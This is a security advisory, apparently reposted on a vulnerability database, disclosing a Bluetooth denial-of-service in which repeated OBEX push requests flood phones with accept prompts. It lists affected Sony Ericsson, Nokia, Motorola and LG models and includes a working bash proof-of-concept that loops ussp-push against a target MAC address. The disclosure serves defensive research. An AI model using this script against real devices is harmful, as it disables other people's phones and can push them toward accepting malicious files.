Bluetooth DoS by obex push [readable]

2007.01.28
Risk: Low
Local: No
Remote: Yes
CWE: N/A

Sorry for the trouble with the wrong characters, below the corrected text with attachment in plain text: Using ussp-push [1], it is possible to send out files very quickly. By continuously trying to push a file, the target is flooded with prompts whether to accept the file or not, which disables any other usage on the phone, including the ability to turn off Bluetooth. We confirmed the attack to work on the following phones (all tested ones!): - Sony Ericsson K700i - Nokia N70 - Motorola MOTORAZR V3 - Sony Ericsson W810i - LG Chocolate KG800 and expect nearly all available phones with Bluetooth to be vulnerable (in contrary to the previous DoS by l2ping). A proof-of-concept code is attached, using ussp-push and targeting a known MAC. This could be easily extended to target all visible devices. Plus, a user could be forced to accept a possibly malicious file with this attack. Using only one Bluetooth-Dongle, we were able to practically disable three phones simlutaneously. Best regards, Stefan Ekerfelt and Armin Hornung [1] http://www.xmailserver.org/ussp-push.html Proof-of-concept code: ------------------------------ #!/bin/bash checkOPUSH() { MAC=$1 OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:) if test "$OCHAN" != "" then OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }') return $OCHAN fi return 0 } if test $# -ne 2 then echo "Usage: $0 <bdaddr> <filename>" exit 127 fi MAC=$1 FILENAME=$2 checkOPUSH $1 OCHAN=$? if test $OCHAN -eq 0 then echo "Couldn't connect to $MAC via OBEX push." exit 127 fi while true do ./ussp-push $MAC@$OCHAN $FILENAME $FILENAME done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top